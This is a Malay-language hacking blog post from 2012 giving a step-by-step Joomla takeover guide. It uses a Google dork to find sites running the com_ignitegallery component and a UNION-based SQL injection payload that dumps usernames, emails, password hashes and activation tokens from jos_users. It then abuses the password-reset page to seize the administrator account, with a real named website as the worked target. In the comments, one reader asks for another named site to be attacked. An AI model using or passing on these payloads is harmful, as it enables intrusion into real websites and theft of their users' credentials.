Joomla Exploit

-sharing is caring
-jangan malas cari kt google :D
-bace dulu step..
-dapat kn code exploit di sini
======

=step1=

======

try cari kt google dengan dork ini :

inurl:"index.php option=com_ignitegallery"



======

=step2=

======

pasang exploit

exploit :

-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--



contoh :

http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

nah muncul kan tuh :D



======

=step3=

======

try reset password

sekarang kita reset password dengan menggunakan exploit ini :

/index.php?option=com_user&view=reset



hm.. minta email dia.. masukin aja email admin tadi..

enter deh :D



======

=step4=

======


wah minta activation pula, tenang kita cari dulu
 activationnya :D

exploit :

-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--



tuh kan kluar activation :D



======

=step5=

======

copy je ke yang tadi lalu enter :D



======

=step6=

======

sekarang nk password baru :D



======

=step7=

======


ok, sekarang kita login ke
 admin

http://www.kaikourafishing.co.nz/administrator/


thumbnail
About The Author

[ EXPLORING KNOWN AND THE UNKNOWN ]

Related Posts

2 comments

  1. Ahmad Syahmi8 June 2012 at 00:27

    erm..
    ley tl0ng exploit kn lman web nie x???
    www.kvkluang.com

    ReplyDelete
  2. Anonymous22 June 2012 at 19:20

    hmm. . .x dapat la brow

    500 - Layout "confirm-4unionallselect12group_ concatid0x3aname0x3ausername0 x3aemail0x3apassword0x3 aactivation45678910fromjos_ users--" not found You may not be able to visit this
    page because of: 1. an out-of-date bookmark/ favourite 2. a search engine that has an out-of-date listing for this
    site 3. a mistyped address 4. you have no access to this page 5. The requested resource was not
    found. 6. An error has occurred while
    processing your request. Please try one of the following
    pages: Home Page If difficulties persist, please contact the
    System Administrator of this site. Layout
    "confirm-4unionallselect12group_
    concatid0x3aname0x3ausername0x3
    aemail0x3apassword0x3aactivation
    45678910fromjos_users--" not found

    ReplyDelete